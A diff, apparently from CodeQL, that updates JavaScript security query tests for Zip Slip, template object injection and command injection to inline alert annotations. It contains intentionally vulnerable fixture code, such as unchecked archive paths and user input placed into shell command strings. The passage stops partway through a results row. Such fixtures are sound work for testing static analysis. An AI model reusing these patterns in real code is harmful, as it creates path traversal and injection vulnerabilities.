a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js @@ -4,35 +4,35 @@ const unzip = require('unzip'); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { - const fileName = entry.path; - entry.pipe(fs.createWriteStream(fileName)); + const fileName = entry.path; // $ Alert + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); var Writer = require('fstream').Writer; fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { - const fileName = entry.path; - entry.pipe(Writer({path: fileName})); + const fileName = entry.path; // $ Alert + entry.pipe(Writer({path: fileName})); // $ Sink }); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { - const fileName = entry.path; - var file = fs.openSync(fileName, "w"); + const fileName = entry.path; // $ Alert + var file = fs.openSync(fileName, "w"); // $ Sink }); const JSZip = require('jszip'); const zip = new JSZip(); const path = require('path'); function doZipSlip() { - for (const name in zip.files) { - fs.createWriteStream(name); + for (const name in zip.files) { // $ Alert + fs.createWriteStream(name); // $ Sink } - zip.forEach((name, file) => { - fs.createWriteStream(name); + zip.forEach((name, file) => { // $ Alert + fs.createWriteStream(name); // $ Sink }); const extractTo = path.resolve("/some/path/to/extract/to"); @@ -50,6 +50,6 @@ function doZipSlip() { files.push(name); } for (const file of files) { - fs.createWriteStream(path.join(extractTo, file)); // OK + fs.createWriteStream(path.join(extractTo, file)); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js index d582c680ef8e..7c110ea95aa1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js @@ -2,7 +2,7 @@ var fs = require('fs'); var unzip = require('unzip'); fs.readFile('path/to/archive.zip', function (err, zipContents) { unzip.Parse(zipContents).on('entry', function (entry) { - var fileName = 'output/path/' + entry.path; - fs.writeFileSync(fileName, entry.contents); + var fileName = 'output/path/' + entry.path; // $ Alert + fs.writeFileSync(fileName, entry.contents); // $ Sink }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js index 239b3df895d5..064bc58e25a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js @@ -4,6 +4,6 @@ const unzipper = require('unzipper'); fs.createReadStream('path/to/archive.zip') .pipe(unzipper.Parse()) .on('entry', function (entry) { - var fileName = entry.path; - entry.pipe(fs.createWriteStream(fileName)); + var fileName = entry.path; // $ Alert + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js index 07918647e6f0..45e4ced8380b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js @@ -26,7 +26,7 @@ fs.createReadStream('archive.zip') } if (!fileName.startsWith(".")) { - entry.pipe(fs.createWriteStream(fileName)); // OK. + entry.pipe(fs.createWriteStream(fileName)); } }); @@ -35,5 +35,5 @@ fs.createReadStream('archive.zip') .on('entry', entry => { const fileName = path.normalize(entry.path); - entry.pipe(fs.createWriteStream(path.basename(fileName))); // OK. + entry.pipe(fs.createWriteStream(path.basename(fileName))); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql deleted file mode 100644 index eae82dc052fe..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TemplateObjectInjectionQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected index 8be388d5ad97..32b2875a86cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected @@ -1,3 +1,43 @@ +#select +| routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | Template object depends on a $@. | routes.js:2:23:2:30 | req.body | user-provided value | +| tst2.js:7:28:7:40 | bodyParameter | tst2.js:6:25:6:32 | req.body | tst2.js:7:28:7:40 | bodyParameter | Template object depends on a $@. | tst2.js:6:25:6:32 | req.body | user-provided value | +| tst2.js:27:28:27:40 | bodyParameter | tst2.js:26:25:26:32 | req.body | tst2.js:27:28:27:40 | bodyParameter | Template object depends on a $@. | tst2.js:26:25:26:32 | req.body | user-provided value | +| tst2.js:35:28:35:40 | bodyParameter | tst2.js:34:25:34:32 | req.body | tst2.js:35:28:35:40 | bodyParameter | Template object depends on a $@. | tst2.js:34:25:34:32 | req.body | user-provided value | +| tst2.js:43:28:43:40 | bodyParameter | tst2.js:42:25:42:32 | req.body | tst2.js:43:28:43:40 | bodyParameter | Template object depends on a $@. | tst2.js:42:25:42:32 | req.body | user-provided value | +| tst2.js:52:28:52:40 | bodyParameter | tst2.js:51:25:51:32 | req.body | tst2.js:52:28:52:40 | bodyParameter | Template object depends on a $@. | tst2.js:51:25:51:32 | req.body | user-provided value | +| tst.js:10:28:10:40 | bodyParameter | tst.js:7:25:7:32 | req.body | tst.js:10:28:10:40 | bodyParameter | Template object depends on a $@. | tst.js:7:25:7:32 | req.body | user-provided value | +| tst.js:11:28:11:41 | queryParameter | tst.js:8:26:8:49 | req.que ... rameter | tst.js:11:28:11:41 | queryParameter | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | +| tst.js:24:28:24:30 | obj | tst.js:8:26:8:49 | req.que ... rameter | tst.js:24:28:24:30 | obj | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | +| tst.js:29:28:29:42 | JSON.parse(str) | tst.js:8:26:8:49 | req.que ... rameter | tst.js:29:28:29:42 | JSON.parse(str) | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | +edges +| tst2.js:6:9:6:46 | bodyParameter | tst2.js:7:28:7:40 | bodyParameter | provenance | | +| tst2.js:6:25:6:32 | req.body | tst2.js:6:25:6:46 | req.bod ... rameter | provenance | Config | +| tst2.js:6:25:6:46 | req.bod ... rameter | tst2.js:6:9:6:46 | bodyParameter | provenance | | +| tst2.js:26:9:26:46 | bodyParameter | tst2.js:27:28:27:40 | bodyParameter | provenance | | +| tst2.js:26:25:26:32 | req.body | tst2.js:26:25:26:46 | req.bod ... rameter | provenance | Config | +| tst2.js:26:25:26:46 | req.bod ... rameter | tst2.js:26:9:26:46 | bodyParameter | provenance | | +| tst2.js:34:9:34:46 | bodyParameter | tst2.js:35:28:35:40 | bodyParameter | provenance | | +| tst2.js:34:25:34:32 | req.body | tst2.js:34:25:34:46 | req.bod ... rameter | provenance | Config | +| tst2.js:34:25:34:46 | req.bod ... rameter | tst2.js:34:9:34:46 | bodyParameter | provenance | | +| tst2.js:42:9:42:46 | bodyParameter | tst2.js:43:28:43:40 | bodyParameter | provenance | | +| tst2.js:42:25:42:32 | req.body | tst2.js:42:25:42:46 | req.bod ... rameter | provenance | Config | +| tst2.js:42:25:42:46 | req.bod ... rameter | tst2.js:42:9:42:46 | bodyParameter | provenance | | +| tst2.js:51:9:51:46 | bodyParameter | tst2.js:52:28:52:40 | bodyParameter | provenance | | +| tst2.js:51:25:51:32 | req.body | tst2.js:51:25:51:46 | req.bod ... rameter | provenance | Config | +| tst2.js:51:25:51:46 | req.bod ... rameter | tst2.js:51:9:51:46 | bodyParameter | provenance | | +| tst.js:7:9:7:46 | bodyParameter | tst.js:10:28:10:40 | bodyParameter | provenance | | +| tst.js:7:25:7:32 | req.body | tst.js:7:25:7:46 | req.bod ... rameter | provenance | Config | +| tst.js:7:25:7:46 | req.bod ... rameter | tst.js:7:9:7:46 | bodyParameter | provenance | | +| tst.js:8:9:8:49 | queryParameter | tst.js:11:28:11:41 | queryParameter | provenance | | +| tst.js:8:9:8:49 | queryParameter | tst.js:20:19:20:32 | queryParameter | provenance | | +| tst.js:8:26:8:49 | req.que ... rameter | tst.js:8:9:8:49 | queryParameter | provenance | | +| tst.js:20:19:20:32 | queryParameter | tst.js:23:24:23:26 | obj | provenance | | +| tst.js:23:24:23:26 | obj | tst.js:24:28:24:30 | obj | provenance | | +| tst.js:23:24:23:26 | obj | tst.js:26:17:26:19 | obj | provenance | | +| tst.js:26:11:26:24 | str | tst.js:29:39:29:41 | str | provenance | | +| tst.js:26:17:26:19 | obj | tst.js:26:17:26:24 | obj + "" | provenance | Config | +| tst.js:26:17:26:24 | obj + "" | tst.js:26:11:26:24 | str | provenance | | +| tst.js:29:39:29:41 | str | tst.js:29:28:29:42 | JSON.parse(str) | provenance | Config | nodes | routes.js:2:23:2:30 | req.body | semmle.label | req.body | | tst2.js:6:9:6:46 | bodyParameter | semmle.label | bodyParameter | @@ -35,44 +75,4 @@ nodes | tst.js:26:17:26:24 | obj + "" | semmle.label | obj + "" | | tst.js:29:28:29:42 | JSON.parse(str) | semmle.label | JSON.parse(str) | | tst.js:29:39:29:41 | str | semmle.label | str | -edges -| tst2.js:6:9:6:46 | bodyParameter | tst2.js:7:28:7:40 | bodyParameter | provenance | | -| tst2.js:6:25:6:32 | req.body | tst2.js:6:25:6:46 | req.bod ... rameter | provenance | Config | -| tst2.js:6:25:6:46 | req.bod ... rameter | tst2.js:6:9:6:46 | bodyParameter | provenance | | -| tst2.js:26:9:26:46 | bodyParameter | tst2.js:27:28:27:40 | bodyParameter | provenance | | -| tst2.js:26:25:26:32 | req.body | tst2.js:26:25:26:46 | req.bod ... rameter | provenance | Config | -| tst2.js:26:25:26:46 | req.bod ... rameter | tst2.js:26:9:26:46 | bodyParameter | provenance | | -| tst2.js:34:9:34:46 | bodyParameter | tst2.js:35:28:35:40 | bodyParameter | provenance | | -| tst2.js:34:25:34:32 | req.body | tst2.js:34:25:34:46 | req.bod ... rameter | provenance | Config | -| tst2.js:34:25:34:46 | req.bod ... rameter | tst2.js:34:9:34:46 | bodyParameter | provenance | | -| tst2.js:42:9:42:46 | bodyParameter | tst2.js:43:28:43:40 | bodyParameter | provenance | | -| tst2.js:42:25:42:32 | req.body | tst2.js:42:25:42:46 | req.bod ... rameter | provenance | Config | -| tst2.js:42:25:42:46 | req.bod ... rameter | tst2.js:42:9:42:46 | bodyParameter | provenance | | -| tst2.js:51:9:51:46 | bodyParameter | tst2.js:52:28:52:40 | bodyParameter | provenance | | -| tst2.js:51:25:51:32 | req.body | tst2.js:51:25:51:46 | req.bod ... rameter | provenance | Config | -| tst2.js:51:25:51:46 | req.bod ... rameter | tst2.js:51:9:51:46 | bodyParameter | provenance | | -| tst.js:7:9:7:46 | bodyParameter | tst.js:10:28:10:40 | bodyParameter | provenance | | -| tst.js:7:25:7:32 | req.body | tst.js:7:25:7:46 | req.bod ... rameter | provenance | Config | -| tst.js:7:25:7:46 | req.bod ... rameter | tst.js:7:9:7:46 | bodyParameter | provenance | | -| tst.js:8:9:8:49 | queryParameter | tst.js:11:28:11:41 | queryParameter | provenance | | -| tst.js:8:9:8:49 | queryParameter | tst.js:20:19:20:32 | queryParameter | provenance | | -| tst.js:8:26:8:49 | req.que ... rameter | tst.js:8:9:8:49 | queryParameter | provenance | | -| tst.js:20:19:20:32 | queryParameter | tst.js:23:24:23:26 | obj | provenance | | -| tst.js:23:24:23:26 | obj | tst.js:24:28:24:30 | obj | provenance | | -| tst.js:23:24:23:26 | obj | tst.js:26:17:26:19 | obj | provenance | | -| tst.js:26:11:26:24 | str | tst.js:29:39:29:41 | str | provenance | | -| tst.js:26:17:26:19 | obj | tst.js:26:17:26:24 | obj + "" | provenance | Config | -| tst.js:26:17:26:24 | obj + "" | tst.js:26:11:26:24 | str | provenance | | -| tst.js:29:39:29:41 | str | tst.js:29:28:29:42 | JSON.parse(str) | provenance | Config | subpaths -#select -| routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | Template object depends on a $@. | routes.js:2:23:2:30 | req.body | user-provided value | -| tst2.js:7:28:7:40 | bodyParameter | tst2.js:6:25:6:32 | req.body | tst2.js:7:28:7:40 | bodyParameter | Template object depends on a $@. | tst2.js:6:25:6:32 | req.body | user-provided value | -| tst2.js:27:28:27:40 | bodyParameter | tst2.js:26:25:26:32 | req.body | tst2.js:27:28:27:40 | bodyParameter | Template object depends on a $@. | tst2.js:26:25:26:32 | req.body | user-provided value | -| tst2.js:35:28:35:40 | bodyParameter | tst2.js:34:25:34:32 | req.body | tst2.js:35:28:35:40 | bodyParameter | Template object depends on a $@. | tst2.js:34:25:34:32 | req.body | user-provided value | -| tst2.js:43:28:43:40 | bodyParameter | tst2.js:42:25:42:32 | req.body | tst2.js:43:28:43:40 | bodyParameter | Template object depends on a $@. | tst2.js:42:25:42:32 | req.body | user-provided value | -| tst2.js:52:28:52:40 | bodyParameter | tst2.js:51:25:51:32 | req.body | tst2.js:52:28:52:40 | bodyParameter | Template object depends on a $@. | tst2.js:51:25:51:32 | req.body | user-provided value | -| tst.js:10:28:10:40 | bodyParameter | tst.js:7:25:7:32 | req.body | tst.js:10:28:10:40 | bodyParameter | Template object depends on a $@. | tst.js:7:25:7:32 | req.body | user-provided value | -| tst.js:11:28:11:41 | queryParameter | tst.js:8:26:8:49 | req.que ... rameter | tst.js:11:28:11:41 | queryParameter | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | -| tst.js:24:28:24:30 | obj | tst.js:8:26:8:49 | req.que ... rameter | tst.js:24:28:24:30 | obj | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | -| tst.js:29:28:29:42 | JSON.parse(str) | tst.js:8:26:8:49 | req.que ... rameter | tst.js:29:28:29:42 | JSON.parse(str) | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref index 28d1b81c5d40..a6487dea1574 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref @@ -1 +1,2 @@ -Security/CWE-073/TemplateObjectInjection.ql +query: Security/CWE-073/TemplateObjectInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-073/routes.js b/javascript/ql/test/query-tests/Security/CWE-073/routes.js index 2bfbad7cd37b..07e03fc0f404 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/routes.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/routes.js @@ -1,3 +1,3 @@ exports.foo = function(req, res) { - res.render('foo', req.body); // NOT OK + res.render('foo', req.body); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index ee2bff5f0e78..04422c253a0c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js @@ -4,29 +4,29 @@ app.set('view engine', 'hbs'); app.use(require('body-parser').json()); app.use(require('body-parser').urlencoded({ extended: false })); app.post('/path', function(req, res) { - var bodyParameter = req.body.bodyParameter; - var queryParameter = req.query.queryParameter; + var bodyParameter = req.body.bodyParameter; // $ Source + var queryParameter = req.query.queryParameter; // $ Source - res.render('template', bodyParameter); // NOT OK - res.render('template', queryParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert + res.render('template', queryParameter); // $ Alert if (typeof bodyParameter === "string") { - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); } - res.render('template', queryParameter + ""); // OK + res.render('template', queryParameter + ""); - res.render('template', {profile: bodyParameter}); // OK + res.render('template', {profile: bodyParameter}); indirect(res, queryParameter); }); function indirect(res, obj) { - res.render("template", obj); // NOT OK + res.render("template", obj); // $ Alert const str = obj + ""; - res.render("template", str); // OK + res.render("template", str); - res.render("template", JSON.parse(str)); // NOT OK + res.render("template", JSON.parse(str)); // $ Alert } let routes = require('./routes'); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 6cb626fd7c1c..5e0168f0707c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js @@ -3,44 +3,44 @@ var app = require('express')(); app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); var app2 = require('express')(); app2.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app3 = require('express')(); app3.set('view engine', 'pug'); app3.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); var app5 = require('express')(); app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); var app6 = require('express')(); app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); const express = require('express'); @@ -48,7 +48,7 @@ var router = express.Router(); var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected index e8d95064b8e1..b68d40a540dd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected @@ -1,3 +1,55 @@ +#select +| actions.js:9:8:9:22 | `echo ${title}` | actions.js:8:17:8:57 | github. ... t.title | actions.js:9:8:9:22 | `echo ${title}` | This command line depends on a $@. | actions.js:8:17:8:57 | github. ... t.title | user-provided value | +| actions.js:19:14:19:31 | `echo ${head_ref}` | actions.js:18:20:18:63 | github. ... ead.ref | actions.js:19:14:19:31 | `echo ${head_ref}` | This command line depends on a $@. | actions.js:18:20:18:63 | github. ... ead.ref | user-provided value | +| child_process-test.js:17:13:17:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:17:13:17:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:18:17:18:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:18:17:18:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:19:17:19:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:19:17:19:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:20:21:20:23 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:20:21:20:23 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:21:14:21:16 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:21:14:21:16 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:22:18:22:20 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:22:18:22:20 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:23:13:23:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:23:13:23:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:39:26:39:28 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:44:5:44:34 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:43:15:43:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:54:5:54:39 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:53:15:53:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:54:56:56 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:6:15:6:49 | url.par ... ry.path | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:48:15:48:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:66:19:66:22 | args | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:75:29:75:31 | cmd | child_process-test.js:73:25:73:31 | req.url | child_process-test.js:75:29:75:31 | cmd | This command line depends on a $@. | child_process-test.js:73:25:73:31 | req.url | user-provided value | +| child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | This command line depends on a $@. | child_process-test.js:83:19:83:36 | req.query.fileName | user-provided value | +| child_process-test.js:94:11:94:35 | "ping " ... ms.host | child_process-test.js:94:21:94:30 | ctx.params | child_process-test.js:94:11:94:35 | "ping " ... ms.host | This command line depends on a $@. | child_process-test.js:94:21:94:30 | ctx.params | user-provided value | +| exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | exec-sh2.js:14:25:14:31 | req.url | exec-sh2.js:10:40:10:46 | command | This command line depends on a $@. | exec-sh2.js:14:25:14:31 | req.url | user-provided value | +| exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | exec-sh.js:19:25:19:31 | req.url | exec-sh.js:15:44:15:50 | command | This command line depends on a $@. | exec-sh.js:19:25:19:31 | req.url | user-provided value | +| execSeries.js:14:41:14:47 | command | execSeries.js:18:34:18:40 | req.url | execSeries.js:14:41:14:47 | command | This command line depends on a $@. | execSeries.js:18:34:18:40 | req.url | user-provided value | +| form-parsers.js:9:8:9:39 | "touch ... nalname | form-parsers.js:9:19:9:26 | req.file | form-parsers.js:9:8:9:39 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:9:19:9:26 | req.file | user-provided value | +| form-parsers.js:14:10:14:37 | "touch ... nalname | form-parsers.js:13:3:13:11 | req.files | form-parsers.js:14:10:14:37 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:13:3:13:11 | req.files | user-provided value | +| form-parsers.js:25:10:25:28 | "touch " + filename | form-parsers.js:24:48:24:55 | filename | form-parsers.js:25:10:25:28 | "touch " + filename | This command line depends on a $@. | form-parsers.js:24:48:24:55 | filename | user-provided value | +| form-parsers.js:36:10:36:31 | "touch ... ds.name | form-parsers.js:35:25:35:30 | fields | form-parsers.js:36:10:36:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:35:25:35:30 | fields | user-provided value | +| form-parsers.js:41:10:41:31 | "touch ... ds.name | form-parsers.js:40:26:40:31 | fields | form-parsers.js:41:10:41:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:40:26:40:31 | fields | user-provided value | +| form-parsers.js:53:10:53:31 | "touch ... ds.name | form-parsers.js:52:34:52:39 | fields | form-parsers.js:53:10:53:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:52:34:52:39 | fields | user-provided value | +| form-parsers.js:59:10:59:33 | "touch ... ilename | form-parsers.js:58:30:58:33 | part | form-parsers.js:59:10:59:33 | "touch ... ilename | This command line depends on a $@. | form-parsers.js:58:30:58:33 | part | user-provided value | +| other.js:7:33:7:35 | cmd | other.js:5:25:5:31 | req.url | other.js:7:33:7:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:8:28:8:30 | cmd | other.js:5:25:5:31 | req.url | other.js:8:28:8:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:9:32:9:34 | cmd | other.js:5:25:5:31 | req.url | other.js:9:32:9:34 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:10:29:10:31 | cmd | other.js:5:25:5:31 | req.url | other.js:10:29:10:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:11:29:11:31 | cmd | other.js:5:25:5:31 | req.url | other.js:11:29:11:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:12:27:12:29 | cmd | other.js:5:25:5:31 | req.url | other.js:12:27:12:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:14:28:14:30 | cmd | other.js:5:25:5:31 | req.url | other.js:14:28:14:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:15:34:15:36 | cmd | other.js:5:25:5:31 | req.url | other.js:15:34:15:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:16:21:16:23 | cmd | other.js:5:25:5:31 | req.url | other.js:16:21:16:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:17:27:17:29 | cmd | other.js:5:25:5:31 | req.url | other.js:17:27:17:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:18:22:18:24 | cmd | other.js:5:25:5:31 | req.url | other.js:18:22:18:24 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:19:36:19:38 | cmd | other.js:5:25:5:31 | req.url | other.js:19:36:19:38 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:22:21:22:23 | cmd | other.js:5:25:5:31 | req.url | other.js:22:21:22:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:23:28:23:30 | cmd | other.js:5:25:5:31 | req.url | other.js:23:28:23:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:26:34:26:36 | cmd | other.js:5:25:5:31 | req.url | other.js:26:34:26:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:28:27:28:29 | cmd | other.js:5:25:5:31 | req.url | other.js:28:27:28:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:30:33:30:35 | cmd | other.js:5:25:5:31 | req.url | other.js:30:33:30:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:34:44:34:46 | cmd | other.js:5:25:5:31 | req.url | other.js:34:44:34:46 | cmd | This 